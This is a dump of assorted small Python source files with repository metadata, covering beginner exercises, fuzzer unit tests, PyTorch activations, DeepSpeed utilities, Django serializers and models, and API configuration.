] | null | null | null | exercises/ex39-pre.py | jinkyukim-me/StudyPython | 6c98598c23c506101882392645fbb14d4aa998d4 | [
"MIT"
] | null | null | null | exercises/ex39-pre.py | jinkyukim-me/StudyPython | 6c98598c23c506101882392645fbb14d4aa998d4 | [
"MIT"
] | null | null | null | things = ['a', 'b', 'c', 'd']
print(things)
print(things[1])
things[1] = 'z'
print(things[1])
print(things)
things = ['a', 'b', 'c', 'd']
print("=" * 50)
stuff = {'name' : 'Jinkyu', 'age' : 40, 'height' : 6 * 12 + 2}
print(stuff)
print(stuff['name'])
print(stuff['age'])
print(stuff['height'])
stuff['city'] = "SF"
print(stuff['city'])
stuff[1] = "Wow"
stuff[2] = "Neato"
print(stuff)
print(stuff[1])
print(stuff[2])
del stuff['city']
del stuff[1]
del stuff[2]
print(stuff)
| 18.269231 | 62 | 0.591579 | 76 | 475 | 3.697368 | 0.302632 | 0.320285 | 0.05694 | 0.064057 | 0.106762 | 0.106762 | 0 | 0 | 0 | 0 | 0 | 0.041162 | 0.130526 | 475 | 25 | 63 | 19 | 0.639225 | 0 | 0 | 0.375 | 0 | 0 | 0.135021 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.583333 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
96023c255885996dd9e97c52c31b8fb90b3a8c8c | 1,176 | py | Python | tests/test_lib.py | tsundokul/pyradamsa | 8d1fdb5c4cefff26fa24b68440110b9fb6558ee4 | [
"MIT"
] | 14 | 2020-07-16T11:25:01.000Z | 2022-01-26T14:01:32.000Z | tests/test_lib.py | tsundokul/pyradamsa | 8d1fdb5c4cefff26fa24b68440110b9fb6558ee4 | [
"MIT"
] | 2 | 2020-07-09T23:14:54.000Z | 2021-06-13T12:55:50.000Z | tests/test_lib.py | tsundokul/pyradamsa | 8d1fdb5c4cefff26fa24b68440110b9fb6558ee4 | [
"MIT"
] | 2 | 2020-11-16T11:30:42.000Z | 2021-07-09T10:34:43.000Z | import ctypes
import pytest
import pyradamsa
import sys
import unittest
def test_lib_present():
assert len(pyradamsa.Radamsa.lib_path()) > 0, 'library not found'
def test_lib_symbols():
lib = ctypes.CDLL(pyradamsa.Radamsa.lib_path())
assert hasattr(lib, 'init')
assert hasattr(lib, 'radamsa')
assert hasattr(lib, 'radamsa_inplace')
def test_default_attrs():
assert pyradamsa.Radamsa().mut_offset == 4096
r = pyradamsa.Radamsa(17, 2048)
assert r.seed == 17
assert r.mut_offset == 2048
r = pyradamsa.Radamsa(mut_offset=19)
assert r.mut_offset == 19
assert r.seed == None
@pytest.fixture
def data():
return b'GET /auth?pass=HelloWorld HTTP1.1'
def test_seed_arg(data):
assert pyradamsa.Radamsa().fuzz(
data, seed=1337) == b'GET /auth?pass=HelloWorld HTTP\xc0\xb1.1'
def test_seed_wraparound(data):
r = pyradamsa.Radamsa()
assert r.fuzz(data, -1) == r.fuzz(data, sys.maxsize * 2 + 1)
def test_seed_static(data):
r = pyradamsa.Radamsa(1337)
assert r.fuzz(data) == r.fuzz(data)
def test_returned_len():
data = b"\xaa\x00"*100
assert len(pyradamsa.Radamsa(seed=1337).fuzz(data)) == 201 | 26.133333 | 71 | 0.687925 | 174 | 1,176 | 4.528736 | 0.33908 | 0.182741 | 0.086294 | 0.045685 | 0.101523 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050672 | 0.177721 | 1,176 | 45 | 72 | 26.133333 | 0.764219 | 0 | 0 | 0 | 0 | 0 | 0.105353 | 0.035684 | 0 | 0 | 0 | 0 | 0.371429 | 1 | 0.228571 | false | 0.057143 | 0.142857 | 0.028571 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
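The wrap-around test above asserts that seeds `-1` and `sys.maxsize * 2 + 1` produce identical fuzz output, which is what unsigned 64-bit truncation of the seed would give. A sketch of the presumed masking (a hypothetical helper, assuming a 64-bit platform; the actual conversion happens inside the ctypes binding):

```python
import sys

def normalize_seed(seed, bits=64):
    # unsigned truncation: -1 maps to 2**64 - 1, the largest
    # 64-bit value, so the two seeds in the test coincide
    return seed & ((1 << bits) - 1)

print(normalize_seed(-1) == sys.maxsize * 2 + 1)  # True on 64-bit Python
```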
960972a213a2328e945c8a5d810eae1623b4c98d | 2,363 | py | Python | caption/models/activations.py | Unbabel/caption | 90725dbf5bc3809e0364d20d0837c58968ceb2b1 | [
"MIT"
] | 3 | 2021-06-14T08:23:00.000Z | 2022-03-04T06:00:50.000Z | caption/models/activations.py | Unbabel/caption | 90725dbf5bc3809e0364d20d0837c58968ceb2b1 | [
"MIT"
] | null | null | null | caption/models/activations.py | Unbabel/caption | 90725dbf5bc3809e0364d20d0837c58968ceb2b1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import math
import torch
from torch import nn
def build_activation(activation: str):
""" Builder function that returns a nn.module activation function.
:param activation: string defining the name of the activation function.
Activations available:
GELU, Swish + every native pytorch activation function.
"""
if hasattr(nn, activation):
return getattr(nn, activation)()
elif activation == "Swish":
return Swish()
elif activation == "GELU":
return GELU()
else:
raise Exception("{} invalid activation function.".format(activation))
def swish(input):
"""
Applies Swish element-wise: A self-gated activation function
swish(x) = x * sigmoid(x)
"""
return input * torch.sigmoid(input)
class Swish(nn.Module):
"""
Applies the Swish function element-wise:
Swish(x) = x * sigmoid(x)
Shape:
- Input: (N, *) where * means, any number of additional
dimensions
- Output: (N, *), same shape as the input
References:
- Related paper:
https://arxiv.org/pdf/1710.05941v1.pdf
"""
def __init__(self):
"""
Init method.
"""
super().__init__() # init the base class
def forward(self, input):
"""
Forward pass of the function.
"""
return swish(input)
def gelu(x):
""" Implementation of the gelu activation function currently in Google Bert repo (identical to OpenAI GPT).
Also see https://arxiv.org/abs/1606.08415
"""
return (
0.5
* x
* (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
)
class GELU(nn.Module):
"""
Applies the GELU function element-wise:
    GELU(x) = 0.5 * x * (1 + tanh(√(2/π) * (x + 0.044715 * x^3)))
Shape:
- Input: (N, *) where * means, any number of additional
dimensions
- Output: (N, *), same shape as the input
References:
- Related paper:
https://arxiv.org/pdf/1606.08415.pdf
"""
def __init__(self):
"""
Init method.
"""
super().__init__() # init the base class
def forward(self, input):
"""
Forward pass of the function.
"""
return gelu(input)
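For a quick sanity check of the two formulas without PyTorch, the scalar versions can be evaluated with the standard library alone (illustrative only; the module above operates on tensors):

```python
import math

def swish_scalar(x):
    # swish(x) = x * sigmoid(x)
    return x / (1.0 + math.exp(-x))

def gelu_scalar(x):
    # tanh approximation used above:
    # 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x^3)))
    return 0.5 * x * (1.0 + math.tanh(math.sqrt(2.0 / math.pi)
                                      * (x + 0.044715 * x ** 3)))

print(round(swish_scalar(1.0), 4))  # 0.7311
print(round(gelu_scalar(1.0), 4))   # 0.8412
```

Both functions pass through the origin and approach the identity for large positive inputs, which is why they behave like smooth variants of ReLU.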
| 23.39604 | 111 | 0.562421 | 276 | 2,363 | 4.757246 | 0.373188 | 0.082254 | 0.029703 | 0.021325 | 0.34882 | 0.325971 | 0.325971 | 0.325971 | 0.325971 | 0.325971 | 0 | 0.032736 | 0.314854 | 2,363 | 100 | 112 | 23.63 | 0.777641 | 0.506983 | 0 | 0.2 | 0 | 0 | 0.044494 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.233333 | false | 0 | 0.1 | 0 | 0.633333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
9611c9fd509515676b6ef58feece6da45d748091 | 883 | py | Python | deepspeed/pt/zero_utils.py | Surfndez/DeepSpeed | bbd8cd7d703a1333849712f33ed2acd8e75be040 | [
"MIT"
] | 1 | 2020-06-01T15:38:25.000Z | 2020-06-01T15:38:25.000Z | deepspeed/pt/zero_utils.py | AIZOOTech/DeepSpeed | bbd8cd7d703a1333849712f33ed2acd8e75be040 | [
"MIT"
] | 13 | 2020-09-25T22:42:51.000Z | 2022-03-12T00:40:26.000Z | deepspeed/pt/zero_utils.py | Surfndez/DeepSpeed | bbd8cd7d703a1333849712f33ed2acd8e75be040 | [
"MIT"
] | null | null | null | import torch
import torch.distributed as dist
def _initialize_parameter_parallel_groups(parameter_parallel_size=None):
data_parallel_size = int(dist.get_world_size())
if parameter_parallel_size is None:
parameter_parallel_size = int(data_parallel_size)
print(data_parallel_size, parameter_parallel_size)
assert data_parallel_size % parameter_parallel_size == 0, \
'world size should be divisible by parameter parallel size'
rank = dist.get_rank()
my_group = None
for i in range(dist.get_world_size() // parameter_parallel_size):
ranks = range(i * parameter_parallel_size, (i + 1) * parameter_parallel_size)
group = torch.distributed.new_group(ranks)
if rank in ranks:
my_group = group
return my_group
def pprint(msg):
if not dist.is_initialized() or dist.get_rank() == 0:
print(msg)
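The rank-grouping arithmetic in `_initialize_parameter_parallel_groups` can be checked in isolation. This sketch reproduces only the index math; the real function also creates `torch.distributed` process groups:

```python
def parameter_parallel_ranks(world_size, parameter_parallel_size, rank):
    """Return the contiguous rank group of size
    `parameter_parallel_size` that contains `rank`,
    mirroring the loop above."""
    assert world_size % parameter_parallel_size == 0, \
        'world size should be divisible by parameter parallel size'
    for i in range(world_size // parameter_parallel_size):
        ranks = range(i * parameter_parallel_size,
                      (i + 1) * parameter_parallel_size)
        if rank in ranks:
            return list(ranks)

print(parameter_parallel_ranks(8, 4, 5))  # [4, 5, 6, 7]
```

With a world size of 8 and a parameter-parallel size of 4, the ranks are partitioned into [0..3] and [4..7], and each rank keeps a handle only to its own group.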
| 35.32 | 85 | 0.719139 | 121 | 883 | 4.92562 | 0.338843 | 0.261745 | 0.317114 | 0.125839 | 0.124161 | 0.124161 | 0 | 0 | 0 | 0 | 0 | 0.004267 | 0.203851 | 883 | 24 | 86 | 36.791667 | 0.843528 | 0 | 0 | 0 | 0 | 0 | 0.064553 | 0 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.25 | 0.15 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
824b75271e9eac19617579349ffd5d9ec2226845 | 836 | py | Python | app/groups/api/serializers.py | Tupek/meetUp-clone | 27267730cc6443e50b64a05dfc0f3d994346a03c | [
"MIT"
] | 8 | 2020-04-23T02:57:04.000Z | 2022-03-17T08:11:23.000Z | app/groups/api/serializers.py | Tupek/meetUp-clone | 27267730cc6443e50b64a05dfc0f3d994346a03c | [
"MIT"
] | 3 | 2021-03-19T02:30:07.000Z | 2021-09-08T01:10:23.000Z | app/groups/api/serializers.py | Tupek/meetUp-clone | 27267730cc6443e50b64a05dfc0f3d994346a03c | [
"MIT"
] | 1 | 2020-04-29T06:14:39.000Z | 2020-04-29T06:14:39.000Z | from rest_framework import serializers
from groups.models import AppGroup
from django.contrib.auth import get_user_model
User = get_user_model()
class AppGroupSerializer(serializers.ModelSerializer):
class Meta:
model = AppGroup
fields = (
'id', 'owner', 'name', 'group_category',
'description', 'group_image', 'member'
)
read_only_fields = ('owner', 'member')
class CreateAppGroupSerializer(serializers.ModelSerializer):
class Meta:
model = AppGroup
fields = (
'id', 'owner', 'name', 'group_category',
'description', 'group_image'
)
read_only_fields = ('owner', )
class MembersAppGroupSerializer(serializers.ModelSerializer):
class Meta:
model = AppGroup
fields = ('member', )
| 23.885714 | 61 | 0.624402 | 76 | 836 | 6.697368 | 0.407895 | 0.153242 | 0.182711 | 0.206287 | 0.495088 | 0.495088 | 0.495088 | 0.388998 | 0.388998 | 0.388998 | 0 | 0 | 0.271531 | 836 | 34 | 62 | 24.588235 | 0.835796 | 0 | 0 | 0.416667 | 0 | 0 | 0.145933 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
825032ecbed0cd7a43816bbe9c4f775712d7dc1a | 237 | py | Python | smartmirror.py | annnvv/smart-mirror-diy | 62e45c4a932a54d41d075289d810b489e384e1f7 | [
"MIT"
] | null | null | null | smartmirror.py | annnvv/smart-mirror-diy | 62e45c4a932a54d41d075289d810b489e384e1f7 | [
"MIT"
] | null | null | null | smartmirror.py | annnvv/smart-mirror-diy | 62e45c4a932a54d41d075289d810b489e384e1f7 | [
"MIT"
] | null | null | null | # smartmirror.py
from utils.display import displayWindow
from utils.weather import Weather
# from utils.train import Wmata
# from utils.clock import Clock
# weather = Weather()
# train = Wmata()
w = displayWindow()
w.root.mainloop()
| 16.928571 | 39 | 0.751055 | 31 | 237 | 5.741935 | 0.451613 | 0.202247 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151899 | 237 | 13 | 40 | 18.230769 | 0.885572 | 0.464135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
82517ed9db7d27547e9dc8dd6cfed68f873dbe84 | 133 | py | Python | sols_python/1017.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | sols_python/1017.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | sols_python/1017.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | tempo = int(input())
velocida_media = int(input())
gasto_carro = 12
distancia = velocida_media * tempo
print(f'{distancia / 12:.3f}') | 26.6 | 34 | 0.714286 | 19 | 133 | 4.842105 | 0.631579 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042735 | 0.120301 | 133 | 5 | 35 | 26.6 | 0.74359 | 0 | 0 | 0 | 0 | 0 | 0.149254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
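The computation above (Beecrowd problem 1017: fuel spent by a car that does 12 km per litre) can be factored into a testable helper that actually uses the consumption constant by name; the function name and sample values below are illustrative, not part of the original:

```python
def fuel_spent(tempo, velocidade_media, km_por_litro=12):
    # distance = average speed * time; fuel = distance / consumption rate
    distancia = velocidade_media * tempo
    return distancia / km_por_litro

print(f'{fuel_spent(10, 85):.3f}')  # 70.833
```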
825d1fc62edebeb1078edfd41ea57c7e4417c55d | 844 | py | Python | src/modules/uavcan/libuavcan/libuavcan/dsdl_compiler/pyuavcan/test/dsdl/test_common.py | shening/PX4-1.34-Vision-Fix | 1e696bc1c2dae71ba7b277d40106a5b6c0a1a050 | [
"BSD-3-Clause"
] | 24 | 2019-08-13T02:39:01.000Z | 2022-03-03T15:44:54.000Z | src/modules/uavcan/libuavcan/libuavcan/dsdl_compiler/pyuavcan/test/dsdl/test_common.py | shening/PX4-1.34-Vision-Fix | 1e696bc1c2dae71ba7b277d40106a5b6c0a1a050 | [
"BSD-3-Clause"
] | 4 | 2021-05-03T16:58:53.000Z | 2021-12-21T21:01:02.000Z | src/modules/uavcan/libuavcan/libuavcan/dsdl_compiler/pyuavcan/test/dsdl/test_common.py | shening/PX4-1.34-Vision-Fix | 1e696bc1c2dae71ba7b277d40106a5b6c0a1a050 | [
"BSD-3-Clause"
] | 11 | 2019-07-28T09:11:40.000Z | 2022-03-17T08:08:27.000Z | import os
import unittest
from uavcan.dsdl import common
class TestCRC16FromBytes(unittest.TestCase):
def test_str(self):
self.assertEqual(common.crc16_from_bytes('123456789'), 0x29B1)
def test_bytes(self):
self.assertEqual(common.crc16_from_bytes(b'123456789'), 0x29B1)
def test_bytearray(self):
self.assertEqual(
common.crc16_from_bytes(bytearray('123456789', 'utf-8')),
0x29B1)
class TestBytesFromCRC64(unittest.TestCase):
def test_zero(self):
self.assertEqual(common.bytes_from_crc64(0),
b"\x00\x00\x00\x00\x00\x00\x00\x00")
def test_check_val(self):
self.assertEqual(common.bytes_from_crc64(0x62EC59E3F1A4F00A),
b"\x0A\xF0\xA4\xF1\xE3\x59\xEC\x62")
if __name__ == '__main__':
unittest.main()
| 27.225806 | 71 | 0.662322 | 103 | 844 | 5.194175 | 0.407767 | 0.078505 | 0.100935 | 0.233645 | 0.409346 | 0.409346 | 0.409346 | 0 | 0 | 0 | 0 | 0.136778 | 0.220379 | 844 | 30 | 72 | 28.133333 | 0.676292 | 0 | 0 | 0 | 0 | 0 | 0.123223 | 0.075829 | 0 | 0 | 0.042654 | 0 | 0.238095 | 1 | 0.238095 | false | 0 | 0.142857 | 0 | 0.47619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
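The 0x29B1 value asserted in `TestCRC16FromBytes` is the standard check value of CRC-16/CCITT-FALSE over the string `'123456789'`. Assuming the stdlib `binascii.crc_hqx` (same 0x1021 polynomial, caller-supplied initial value), it can be reproduced directly:

```python
import binascii

# CRC-CCITT with initial value 0xFFFF over the canonical check string
# "123456789" yields 0x29B1, matching the expectations in the tests above.
crc = binascii.crc_hqx(b'123456789', 0xFFFF)
print(hex(crc))  # 0x29b1
```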
825efd699cccd09b54702507425048855fd758bc | 301 | py | Python | recipes/python/django-rest-framework/{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/api/views.py | roscopecoltran/sniperkit-cookiecutter | 50b7ecd87d4127875764c2b7d4668ede2ed4b299 | [
"BSD-3-Clause"
] | null | null | null | recipes/python/django-rest-framework/{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/api/views.py | roscopecoltran/sniperkit-cookiecutter | 50b7ecd87d4127875764c2b7d4668ede2ed4b299 | [
"BSD-3-Clause"
] | null | null | null | recipes/python/django-rest-framework/{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/api/views.py | roscopecoltran/sniperkit-cookiecutter | 50b7ecd87d4127875764c2b7d4668ede2ed4b299 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib.auth import get_user_model
from rest_framework import viewsets
from {{ cookiecutter.project_slug }}.api.serializers import UserSerializer
User = get_user_model()
class UserViewSet(viewsets.ReadOnlyModelViewSet):
serializer_class = UserSerializer
queryset = User.objects.all()
| 25.083333 | 74 | 0.803987 | 36 | 301 | 6.527778 | 0.638889 | 0.059574 | 0.102128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122924 | 301 | 11 | 75 | 27.363636 | 0.890152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.428571 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
82614460909a389968db1eaa29f2631660d70dea | 176 | py | Python | syntax/function/variableLengthParameterExample.py | Dev-Learn/LearnPython | a601f5eeeb05236a3e179bf8c34425a95cb0c919 | [
"Apache-2.0"
] | null | null | null | syntax/function/variableLengthParameterExample.py | Dev-Learn/LearnPython | a601f5eeeb05236a3e179bf8c34425a95cb0c919 | [
"Apache-2.0"
] | null | null | null | syntax/function/variableLengthParameterExample.py | Dev-Learn/LearnPython | a601f5eeeb05236a3e179bf8c34425a95cb0c919 | [
"Apache-2.0"
] | null | null | null | def sumValues(a, b, *others):
retValue = a + b
    # The 'others' parameter behaves like an array (it is a tuple).
for other in others:
retValue = retValue + other
return retValue | 22 | 42 | 0.613636 | 24 | 176 | 4.5 | 0.666667 | 0.037037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.301136 | 176 | 8 | 43 | 22 | 0.878049 | 0.204545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
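A short usage sketch of the variable-length parameter example above; the function is reproduced so the snippet runs standalone:

```python
def sumValues(a, b, *others):
    retValue = a + b
    # The extra positional arguments arrive in 'others' as a tuple.
    for other in others:
        retValue = retValue + other
    return retValue

print(sumValues(1, 2))        # 3
print(sumValues(1, 2, 3, 4))  # 10
```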
8263c1323507252c0b76643727850e458bc712cb | 566 | py | Python | app/config.py | MachariaMark/newsapi | d24a90ea7ddbea0eb51a3a42790c43d7bba72150 | [
"MIT"
] | null | null | null | app/config.py | MachariaMark/newsapi | d24a90ea7ddbea0eb51a3a42790c43d7bba72150 | [
"MIT"
] | null | null | null | app/config.py | MachariaMark/newsapi | d24a90ea7ddbea0eb51a3a42790c43d7bba72150 | [
"MIT"
] | null | null | null | class Config:
'''
General configuration parent class
'''
NEWS_API_BASE_URL ='https://newsapi.org/v2/sources?apiKey={}'
ARTICLE_API_BASE_URL = 'https://newsapi.org/v2/everything?sources={}&apiKey={}'
class ProdConfig(Config):
'''
Production configuration child class
Args:
Config: The parent configuration class with general configuration settings
'''
pass
class DevConfig(Config):
'''
Development configuration child class
Args:
Config: The parent configuration class with general configuration settings
'''
DEBUG = True | 23.583333 | 81 | 0.720848 | 64 | 566 | 6.28125 | 0.453125 | 0.149254 | 0.049751 | 0.074627 | 0.59204 | 0.59204 | 0.59204 | 0.457711 | 0.457711 | 0.457711 | 0 | 0.004274 | 0.173145 | 566 | 24 | 82 | 23.583333 | 0.854701 | 0.485866 | 0 | 0 | 0 | 0 | 0.376 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.142857 | 0 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
826514812a859c92069a060dc805deeaf6c03969 | 231 | py | Python | lib/feature_lib.py | AlphaTac/AlphaCore | 23c7cc58589388268933f84b33d2920e3436b4f9 | [
"MIT"
] | 1 | 2018-05-05T16:50:06.000Z | 2018-05-05T16:50:06.000Z | lib/feature_lib.py | AlphaTac-AI/AlphaCore | 23c7cc58589388268933f84b33d2920e3436b4f9 | [
"MIT"
] | 3 | 2018-05-26T10:56:30.000Z | 2018-05-26T10:58:45.000Z | lib/feature_lib.py | AlphaTac/AlphaCore | 23c7cc58589388268933f84b33d2920e3436b4f9 | [
"MIT"
] | null | null | null | import gc
def build_features(df, feature_pipeline):
feature_set=set()
for fun in feature_pipeline:
df, feature_set=fun(df, feature_set)
df = df[list(feature_set)]
gc.collect()
return df, feature_set
| 17.769231 | 44 | 0.679654 | 34 | 231 | 4.382353 | 0.441176 | 0.33557 | 0.241611 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.225108 | 231 | 12 | 45 | 19.25 | 0.832402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
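How `build_features` threads a DataFrame and a growing feature set through a pipeline can be sketched without pandas. `Frame` below is a toy stand-in for a DataFrame (supporting only list-of-columns selection), and `add_double` is a hypothetical pipeline step; neither is part of the original:

```python
class Frame(dict):
    """Toy column store: maps column name -> list of values."""
    def __getitem__(self, key):
        if isinstance(key, list):  # df[['a', 'b']]-style column selection
            return Frame({k: dict.__getitem__(self, k) for k in key})
        return dict.__getitem__(self, key)

def build_features(df, feature_pipeline):
    feature_set = set()
    for fun in feature_pipeline:
        df, feature_set = fun(df, feature_set)
    df = df[list(feature_set)]  # keep only the registered feature columns
    return df, feature_set

def add_double(df, feature_set):
    # Hypothetical step: derive a column and register both as features.
    df['double_x'] = [v * 2 for v in df['x']]
    return df, feature_set | {'x', 'double_x'}

out, feats = build_features(Frame({'x': [1, 2, 3], 'unused': [0, 0, 0]}),
                            [add_double])
print(sorted(out))      # ['double_x', 'x']
print(out['double_x'])  # [2, 4, 6]
```

The original additionally calls `gc.collect()` before returning, which only matters for reclaiming the dropped columns eagerly.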
826c4178e2b4d3fcec899caad86208514657b500 | 2,051 | py | Python | cyder/base/models.py | jwasinger/cyder | de3e61ca47b71ac28d0a36568f250f4bc2617f22 | [
"BSD-3-Clause"
] | null | null | null | cyder/base/models.py | jwasinger/cyder | de3e61ca47b71ac28d0a36568f250f4bc2617f22 | [
"BSD-3-Clause"
] | null | null | null | cyder/base/models.py | jwasinger/cyder | de3e61ca47b71ac28d0a36568f250f4bc2617f22 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from django.utils.safestring import mark_safe
from cyder.base.utils import classproperty
class BaseModel(models.Model):
"""
Base class for models to abstract some common features.
* Adds automatic created and modified fields to the model.
"""
created = models.DateTimeField(auto_now_add=True, null=True)
modified = models.DateTimeField(auto_now=True, null=True)
class Meta:
abstract = True
get_latest_by = 'created'
def __str__(self):
return unicode(self).encode('ascii', 'replace')
@classproperty
@classmethod
def pretty_type(cls):
return cls.__name__.lower()
@property
def pretty_name(self):
return unicode(self)
def cyder_unique_error_message(self, model_class, unique_check):
"""
Override this method to provide a custom error message for
unique or unique_together fields. It should return a descriptive error
message that ends in a period.
"""
return super(BaseModel, self).unique_error_message(
model_class, unique_check)
def unique_error_message(self, model_class, unique_check):
"""
Don't override this method. Override cyder_unique_error_message
instead.
"""
error = self.cyder_unique_error_message(model_class, unique_check)
kwargs = {}
for field in unique_check:
kwargs[field] = getattr(self, field)
obj = model_class.objects.filter(**kwargs)
if obj and hasattr(obj.get(), 'get_detail_url'):
error = error[:-1] + u' at <a href="{0}">{1}.</a>'.format(
obj.get().get_detail_url(), obj.get())
error = mark_safe(error)
return error
def reload(self):
return self.__class__.objects.get(pk=self.pk)
class ExpirableMixin(models.Model):
expire = models.DateTimeField(null=True, blank=True,
help_text='Format: MM/DD/YYYY')
class Meta:
abstract = True
| 29.724638 | 78 | 0.639688 | 252 | 2,051 | 5.007937 | 0.404762 | 0.066561 | 0.071315 | 0.066561 | 0.158479 | 0.129952 | 0.129952 | 0.068146 | 0 | 0 | 0 | 0.001988 | 0.264261 | 2,051 | 68 | 79 | 30.161765 | 0.834327 | 0.170161 | 0 | 0.102564 | 0 | 0 | 0.047767 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0.102564 | 0.564103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
